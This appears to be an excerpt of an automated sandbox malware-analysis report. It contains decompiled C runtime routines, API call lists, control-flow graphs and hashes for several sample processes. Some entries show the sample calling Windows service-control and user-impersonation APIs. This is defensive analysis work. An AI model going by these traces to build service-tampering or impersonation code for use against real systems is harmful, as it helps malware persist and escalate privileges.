                            • __flush.LIBCMT ref: 0040BB6E
                            • __fileno.LIBCMT ref: 0040BB8E
                            • __locking.LIBCMT ref: 0040BB95
                            • __flsbuf.LIBCMT ref: 0040BBC0
                              • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                              • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                            Memory Dump Source
                            • Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                            • String ID:
                            • API String ID: 3240763771-0
                            • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                            • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                            • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                            • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0067553A
                            • __isleadbyte_l.LIBCMT ref: 0067556E
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 0067559F
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 0067560D
                            Memory Dump Source
                            • Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_660000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                            • Instruction ID: f4bc9059abe14627da1e7f13b205da00697422017ad6babe850f41a0a3fa00c7
                            • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                            • Instruction Fuzzy Hash: 4C318F71A10685EFEB20DF64C8849BE7BA7EF01311B18C5E9F46A8B2A1E771D940DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                            				char _v8;
                            				signed int _v12;
                            				char _v20;
                            				char _t43;
                            				char _t46;
                            				signed int _t53;
                            				signed int _t54;
                            				intOrPtr _t56;
                            				int _t57;
                            				int _t58;
                            				signed short* _t59;
                            				short* _t60;
                            				int _t65;
                            				char* _t72;
                            
                            				_t72 = _a8;
                            				if(_t72 == 0 || _a12 == 0) {
                            					L5:
                            					return 0;
                            				} else {
                            					if( *_t72 != 0) {
                            						E0040EC86( &_v20, _a16);
                            						_t43 = _v20;
                            						__eflags =  *(_t43 + 0x14);
                            						if( *(_t43 + 0x14) != 0) {
                            							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
                            							__eflags = _t46;
                            							if(_t46 == 0) {
                            								__eflags = _a4;
                            								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                            								if(__eflags != 0) {
                            									L10:
                            									__eflags = _v8;
                            									if(_v8 != 0) {
                            										_t53 = _v12;
                            										_t11 = _t53 + 0x70;
                            										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                            										__eflags =  *_t11;
                            									}
                            									return 1;
                            								}
                            								L21:
                            								_t54 = E0040BFC1(__eflags);
                            								 *_t54 = 0x2a;
                            								__eflags = _v8;
                            								if(_v8 != 0) {
                            									_t54 = _v12;
                            									_t33 = _t54 + 0x70;
                            									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                            									__eflags =  *_t33;
                            								}
                            								return _t54 | 0xffffffff;
                            							}
                            							_t56 = _v20;
                            							_t65 =  *(_t56 + 0xac);
                            							__eflags = _t65 - 1;
                            							if(_t65 <= 1) {
                            								L17:
                            								__eflags = _a12 -  *(_t56 + 0xac);
                            								if(__eflags < 0) {
                            									goto L21;
                            								}
                            								__eflags = _t72[1];
                            								if(__eflags == 0) {
                            									goto L21;
                            								}
                            								L19:
                            								_t57 =  *(_t56 + 0xac);
                            								__eflags = _v8;
                            								if(_v8 == 0) {
                            									return _t57;
                            								}
                            								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                            								return _t57;
                            							}
                            							__eflags = _a12 - _t65;
                            							if(_a12 < _t65) {
                            								goto L17;
                            							}
                            							__eflags = _a4;
                            							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                            							__eflags = _t58;
                            							_t56 = _v20;
                            							if(_t58 != 0) {
                            								goto L19;
                            							}
                            							goto L17;
                            						}
                            						_t59 = _a4;
                            						__eflags = _t59;
                            						if(_t59 != 0) {
                            							 *_t59 =  *_t72 & 0x000000ff;
                            						}
                            						goto L10;
                            					} else {
                            						_t60 = _a4;
                            						if(_t60 != 0) {
                            							 *_t60 = 0;
                            						}
                            						goto L5;
                            					}
                            				}
                            			}

















                            0x004152a9
                            0x004152b0
                            0x004152c7
                            0x00000000
                            0x004152b7
                            0x004152b9
                            0x004152d3
                            0x004152d8
                            0x004152db
                            0x004152de
                            0x00415307
                            0x0041530e
                            0x00415310
                            0x00415391
                            0x004153ac
                            0x004153ae
                            0x004152ee
                            0x004152ee
                            0x004152f1
                            0x004152f3
                            0x004152f6
                            0x004152f6
                            0x004152f6
                            0x004152f6
                            0x00000000
                            0x004152fc
                            0x00415370
                            0x00415370
                            0x00415375
                            0x0041537b
                            0x0041537e
                            0x00415380
                            0x00415383
                            0x00415383
                            0x00415383
                            0x00415383
                            0x00000000
                            0x00415387
                            0x00415312
                            0x00415315
                            0x0041531b
                            0x0041531e
                            0x00415345
                            0x00415348
                            0x0041534e
                            0x00000000
                            0x00000000
                            0x00415350
                            0x00415353
                            0x00000000
                            0x00000000
                            0x00415355
                            0x00415355
                            0x0041535b
                            0x0041535e
                            0x004152cc
                            0x004152cc
                            0x00415367
                            0x00000000
                            0x00415367
                            0x00415320
                            0x00415323
                            0x00000000
                            0x00000000
                            0x00415327
                            0x00415338
                            0x0041533e
                            0x00415340
                            0x00415343
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00415343
                            0x004152e0
                            0x004152e3
                            0x004152e5
                            0x004152eb
                            0x004152eb
                            0x00000000
                            0x004152bb
                            0x004152bb
                            0x004152c0
                            0x004152c4
                            0x004152c4
                            0x00000000
                            0x004152c0
                            0x004152b9

                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                            • __isleadbyte_l.LIBCMT ref: 00415307
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                            Memory Dump Source
                            • Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                            • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                            • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                            • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_660000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                            • String ID:
                            • API String ID: 3016257755-0
                            • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                            • Instruction ID: 726947e59875341cdb87a83be0133e492432232cff7712439198ee5eea4d0e3a
                            • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                            • Instruction Fuzzy Hash: C5114BB200015ABBCF165E85CC45CEE3F67BB18354B988519FA2C59231D237CAB2BB85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                            				intOrPtr _t25;
                            				void* _t26;
                            				void* _t28;
                            
                            				_t25 = _a16;
                            				if(_t25 == 0x65 || _t25 == 0x45) {
                            					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                            					goto L9;
                            				} else {
                            					_t34 = _t25 - 0x66;
                            					if(_t25 != 0x66) {
                            						__eflags = _t25 - 0x61;
                            						if(_t25 == 0x61) {
                            							L7:
                            							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                            						} else {
                            							__eflags = _t25 - 0x41;
                            							if(__eflags == 0) {
                            								goto L7;
                            							} else {
                            								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                            							}
                            						}
                            						L9:
                            						return _t26;
                            					} else {
                            						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                            					}
                            				}
                            			}






                            0x004134e0
                            0x004134e6
                            0x00413559
                            0x00000000
                            0x004134ed
                            0x004134ed
                            0x004134f0
                            0x0041350b
                            0x0041350e
                            0x0041352e
                            0x00413540
                            0x00413510
                            0x00413510
                            0x00413513
                            0x00000000
                            0x00413515
                            0x00413527
                            0x00413527
                            0x00413513
                            0x0041355e
                            0x00413562
                            0x004134f2
                            0x0041350a
                            0x0041350a
                            0x004134f0

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                            • String ID:
                            • API String ID: 3016257755-0
                            • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                            • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                            • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                            • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Callgraph

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 7ffc9d7d1a1d-7ffc9d7d1a25 1 7ffc9d7d1a28-7ffc9d7d1ad9 ControlService 0->1 2 7ffc9d7d1a27 0->2 5 7ffc9d7d1adb 1->5 6 7ffc9d7d1ae1-7ffc9d7d1b17 1->6 2->1 5->6 7 7ffc9d7d1b19-7ffc9d7d1b21 6->7 8 7ffc9d7d1b22-7ffc9d7d1bd8 6->8 7->8 12 7ffc9d7d1bda-7ffc9d7d1be9 8->12 13 7ffc9d7d1c36-7ffc9d7d1c68 8->13 12->13 14 7ffc9d7d1beb-7ffc9d7d1bee 12->14 20 7ffc9d7d1c6a-7ffc9d7d1c7a 13->20 21 7ffc9d7d1cc7-7ffc9d7d1d00 13->21 15 7ffc9d7d1c28-7ffc9d7d1c30 14->15 16 7ffc9d7d1bf0-7ffc9d7d1c03 14->16 15->13 18 7ffc9d7d1c05 16->18 19 7ffc9d7d1c07-7ffc9d7d1c1a 16->19 18->19 19->19 23 7ffc9d7d1c1c-7ffc9d7d1c24 19->23 20->21 22 7ffc9d7d1c7c-7ffc9d7d1c7f 20->22 29 7ffc9d7d1d02-7ffc9d7d1d11 21->29 30 7ffc9d7d1d5e-7ffc9d7d1d97 21->30 24 7ffc9d7d1cb9-7ffc9d7d1cc1 22->24 25 7ffc9d7d1c81-7ffc9d7d1c94 22->25 23->15 24->21 27 7ffc9d7d1c98-7ffc9d7d1cab 25->27 28 7ffc9d7d1c96 25->28 27->27 31 7ffc9d7d1cad-7ffc9d7d1cb5 27->31 28->27 29->30 32 7ffc9d7d1d13-7ffc9d7d1d16 29->32 36 7ffc9d7d1d99-7ffc9d7d1da9 30->36 37 7ffc9d7d1df6-7ffc9d7d1e2f 30->37 31->24 34 7ffc9d7d1d18-7ffc9d7d1d2b 32->34 35 7ffc9d7d1d50-7ffc9d7d1d58 32->35 38 7ffc9d7d1d2d 34->38 39 7ffc9d7d1d2f-7ffc9d7d1d42 34->39 35->30 36->37 40 7ffc9d7d1dab-7ffc9d7d1dae 36->40 47 7ffc9d7d1e31-7ffc9d7d1e41 37->47 48 7ffc9d7d1e8e-7ffc9d7d1ec7 37->48 38->39 39->39 41 7ffc9d7d1d44-7ffc9d7d1d4c 39->41 42 7ffc9d7d1de8-7ffc9d7d1df0 40->42 43 7ffc9d7d1db0-7ffc9d7d1dc3 40->43 41->35 42->37 45 7ffc9d7d1dc5 43->45 46 7ffc9d7d1dc7-7ffc9d7d1dda 43->46 45->46 46->46 49 7ffc9d7d1ddc-7ffc9d7d1de4 46->49 47->48 50 7ffc9d7d1e43-7ffc9d7d1e46 47->50 56 7ffc9d7d1ec9-7ffc9d7d1ed9 48->56 57 7ffc9d7d1f26-7ffc9d7d1fe2 ChangeServiceConfigA 48->57 49->42 52 7ffc9d7d1e48-7ffc9d7d1e5b 50->52 53 7ffc9d7d1e80-7ffc9d7d1e88 50->53 54 7ffc9d7d1e5d 52->54 55 7ffc9d7d1e5f-7ffc9d7d1e72 52->55 53->48 54->55 55->55 58 7ffc9d7d1e74-7ffc9d7d1e7c 55->58 56->57 59 7ffc9d7d1edb-7ffc9d7d1ede 56->59 63 7ffc9d7d1fea-7ffc9d7d1ffc call 7ffc9d7d2049 57->63 64 7ffc9d7d1fe4 57->64 58->53 61 7ffc9d7d1f18-7ffc9d7d1f20 59->61 62 7ffc9d7d1ee0-7ffc9d7d1ef3 59->62 61->57 65 7ffc9d7d1ef5 62->65 66 7ffc9d7d1ef7-7ffc9d7d1f0a 62->66 69 7ffc9d7d2001-7ffc9d7d202d 63->69 64->63 65->66 66->66 68 7ffc9d7d1f0c-7ffc9d7d1f14 66->68 68->61 70 7ffc9d7d2034-7ffc9d7d2047 69->70 71 7ffc9d7d202f 69->71 71->70
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.315242768.00007FFC9D7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D7D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_7ffc9d7d0000_nika.jbxd
                            Similarity
                            • API ID: Service$ChangeConfigControl
                            • String ID:
                            • API String ID: 1778205439-0
                            • Opcode ID: 5c49d11739c9481cd7eb876e309708ce26c3a3e0825fcf10b9c66c7281bf8bf6
                            • Instruction ID: f8b1ffa4454d3d663c44a49255adc3ad078775fe37cec1f1078d1da396ecffe2
                            • Opcode Fuzzy Hash: 5c49d11739c9481cd7eb876e309708ce26c3a3e0825fcf10b9c66c7281bf8bf6
                            • Instruction Fuzzy Hash: 2412B530918A4D4FEB68DF28D8467F97BD0FB58311F00426ED88EC7295EB74A5818B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.315242768.00007FFC9D7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D7D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_7ffc9d7d0000_nika.jbxd
                            Similarity
                            • API ID: NameUser
                            • String ID:
                            • API String ID: 2645101109-0
                            • Opcode ID: afa49cab467db73ff299f71806981a189b63f683dfc5908550cd09f264ff72d5
                            • Instruction ID: e6e5160edfc1a47591407081d9af9ec2f8a3c732e12af8fdd9198d6d500ef23d
                            • Opcode Fuzzy Hash: afa49cab467db73ff299f71806981a189b63f683dfc5908550cd09f264ff72d5
                            • Instruction Fuzzy Hash: 45918030A08A5D8FEB68DF18C8557E97BE1FF59310F00413AD88DC7295DB34A981CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.315242768.00007FFC9D7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D7D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_7ffc9d7d0000_nika.jbxd
                            Similarity
                            • API ID: ImpersonateLoggedUser
                            • String ID:
                            • API String ID: 2216092060-0
                            • Opcode ID: 8a04ff8efed501c5213764d1bd46e515ec9788941069bc2b9cef4ce5c8ce05fe
                            • Instruction ID: b5b2ff4b499b047c268bbfb5749acdd986a36fa545cbd3256d5635522fd0013b
                            • Opcode Fuzzy Hash: 8a04ff8efed501c5213764d1bd46e515ec9788941069bc2b9cef4ce5c8ce05fe
                            • Instruction Fuzzy Hash: 14A10231A0CB9C4FDB59EB6898556F9BFE0EF56320F0401BFD089D31A3EA286845C761
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 159 7ffc9d7d0c34-7ffc9d7d0c3b 160 7ffc9d7d0c46-7ffc9d7d0ce5 159->160 161 7ffc9d7d0c3d-7ffc9d7d0c45 159->161 165 7ffc9d7d0ce7-7ffc9d7d0cf6 160->165 166 7ffc9d7d0d40-7ffc9d7d0daa OpenServiceA 160->166 161->160 165->166 167 7ffc9d7d0cf8-7ffc9d7d0cfb 165->167 171 7ffc9d7d0db2-7ffc9d7d0de6 call 7ffc9d7d0e02 166->171 172 7ffc9d7d0dac 166->172 169 7ffc9d7d0d35-7ffc9d7d0d3d 167->169 170 7ffc9d7d0cfd-7ffc9d7d0d10 167->170 169->166 173 7ffc9d7d0d14-7ffc9d7d0d27 170->173 174 7ffc9d7d0d12 170->174 178 7ffc9d7d0de8 171->178 179 7ffc9d7d0ded-7ffc9d7d0e00 171->179 172->171 173->173 176 7ffc9d7d0d29-7ffc9d7d0d31 173->176 174->173 176->169 178->179
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.315242768.00007FFC9D7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D7D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_7ffc9d7d0000_nika.jbxd
                            Similarity
                            • API ID: OpenService
                            • String ID:
                            • API String ID: 3098006287-0
                            • Opcode ID: a7af5fe9e9eab0c9631d47095695a6de3f80d68f865e987a3f628571864c8bbe
                            • Instruction ID: 05cb10b5a9cc0a1b7c952e09657002a8d5f805e869ccc6533274c49b7c18de9e
                            • Opcode Fuzzy Hash: a7af5fe9e9eab0c9631d47095695a6de3f80d68f865e987a3f628571864c8bbe
                            • Instruction Fuzzy Hash: 7B51B630918A4D4FEB58EF28C85A7F97BE1FB59311F10416EE84DC3296EA74E841CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 180 7ffc9d7d0b2d-7ffc9d7d0bb8 184 7ffc9d7d0bba-7ffc9d7d0bbf 180->184 185 7ffc9d7d0bc2-7ffc9d7d0bc7 180->185 184->185 186 7ffc9d7d0bc9-7ffc9d7d0bce 185->186 187 7ffc9d7d0bd1-7ffc9d7d0c08 OpenSCManagerW 185->187 186->187 188 7ffc9d7d0c0a 187->188 189 7ffc9d7d0c10-7ffc9d7d0c2d 187->189 188->189
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.315242768.00007FFC9D7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D7D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_7ffc9d7d0000_nika.jbxd
                            Similarity
                            • API ID: ManagerOpen
                            • String ID:
                            • API String ID: 1889721586-0
                            • Opcode ID: 91b1fa037ec960087646830370b956d5a3deb1d26afd3ce55d96e8672ddac088
                            • Instruction ID: 8c46da5ceb2811754abca09755c7badd408c6edca2ffc5dad68602eb0ba63d25
                            • Opcode Fuzzy Hash: 91b1fa037ec960087646830370b956d5a3deb1d26afd3ce55d96e8672ddac088
                            • Instruction Fuzzy Hash: 3F319F3190CA1C8FDB28DF989849AFABBE0EB59311F00816FD08AD3652DB70A545CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 190 7ffc9d7d108a-7ffc9d7d10b3 191 7ffc9d7d10b5-7ffc9d7d10bd 190->191 192 7ffc9d7d10be-7ffc9d7d1152 FindCloseChangeNotification 190->192 191->192 195 7ffc9d7d115a-7ffc9d7d1181 192->195 196 7ffc9d7d1154 192->196 196->195
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.315242768.00007FFC9D7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D7D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_7ffc9d7d0000_nika.jbxd
                            Similarity
                            • API ID: ChangeCloseFindNotification
                            • String ID:
                            • API String ID: 2591292051-0
                            • Opcode ID: 3e041b7d675c6e2e8cf393a17d153bcdaabb623953d1def14e7d881c413d71bf
                            • Instruction ID: bbf7f51e103b350e1cdade49f10750a65811d682ae1031082683468ad57ee874
                            • Opcode Fuzzy Hash: 3e041b7d675c6e2e8cf393a17d153bcdaabb623953d1def14e7d881c413d71bf
                            • Instruction Fuzzy Hash: 4231E73090C78C9FDB1ADB6898157E9BFF0EF56320F04429FD089D31A2DA656456CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • GetCurrentProcess.KERNEL32(0137E000,?,0137A9A0,0137AF26,?,0137E000,0137AF26,0137E000), ref: 0137A9C3
                            • TerminateProcess.KERNEL32(00000000,?,0137A9A0,0137AF26,?,0137E000,0137AF26,0137E000), ref: 0137A9CA
                            • ExitProcess.KERNEL32 ref: 0137A9DC
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: 5ffe43fb7056b254620c7ce13d5d8805218e2eb6fcfaa2215697f764f76db446
                            • Instruction ID: ff4b435a737b800639164e48054e821d698c6f1aacf1a6f2c39973921bf54d79
                            • Opcode Fuzzy Hash: 5ffe43fb7056b254620c7ce13d5d8805218e2eb6fcfaa2215697f764f76db446
                            • Instruction Fuzzy Hash: DFE0B636000248ABCB326F68D808A9D3B69EB52745F194425F90597121CB3DE991DB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetUnhandledExceptionFilter.KERNELBASE(Function_00017A80,01377776), ref: 01377A79
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 343b7ae296386b3e35961c0aee6128b585aa86236a7900b50e72cfabe8e046da
                            • Instruction ID: f86caba0a28797710b7f4011b36b403f26dcfcd71197bc003efef6b6ab599649
                            • Opcode Fuzzy Hash: 343b7ae296386b3e35961c0aee6128b585aa86236a7900b50e72cfabe8e046da
                            • Instruction Fuzzy Hash:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • InitializeCriticalSectionAndSpinCount.KERNEL32(01399708,00000FA0,?,?,01377028), ref: 01377056
                            • GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,01377028), ref: 01377061
                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,01377028), ref: 01377072
                            • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 01377084
                            • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 01377092
                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,01377028), ref: 013770B5
                            • ___scrt_fastfail.LIBCMT ref: 013770C6
                            • DeleteCriticalSection.KERNEL32(01399708,00000007,?,?,01377028), ref: 013770D1
                            • CloseHandle.KERNEL32(00000000,?,?,01377028), ref: 013770E1
                            Strings
                            • WakeAllConditionVariable, xrefs: 0137708A
                            • SleepConditionVariableCS, xrefs: 0137707E
                            • kernel32.dll, xrefs: 0137706D
                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0137705C
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                            • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                            • API String ID: 3578986977-3242537097
                            • Opcode ID: 444747a9df33cab56178116047a9459a97742f17e73d378e5c650846c806563c
                            • Instruction ID: f7c1576a601b3b26bcfa2fc7538983c30f97c92df82a7d3f5b21196dfd6cd8a8
                            • Opcode Fuzzy Hash: 444747a9df33cab56178116047a9459a97742f17e73d378e5c650846c806563c
                            • Instruction Fuzzy Hash: FC0188756513116BEB321F79ED0DBAE3A9CEB85B4DF050438FA04D6248EE79C4008761
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 01382368: CreateFileW.KERNELBASE(00000000,00000000,?,01382758,?,?,00000000,?,01382758,00000000,0000000C), ref: 01382385
                            • GetLastError.KERNEL32 ref: 013827C3
                            • __dosmaperr.LIBCMT ref: 013827CA
                            • GetFileType.KERNELBASE(00000000), ref: 013827D6
                            • GetLastError.KERNEL32 ref: 013827E0
                            • __dosmaperr.LIBCMT ref: 013827E9
                            • CloseHandle.KERNEL32(00000000), ref: 01382809
                            • CloseHandle.KERNEL32(0137D4F0), ref: 01382956
                            • GetLastError.KERNEL32 ref: 01382988
                            • __dosmaperr.LIBCMT ref: 0138298F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
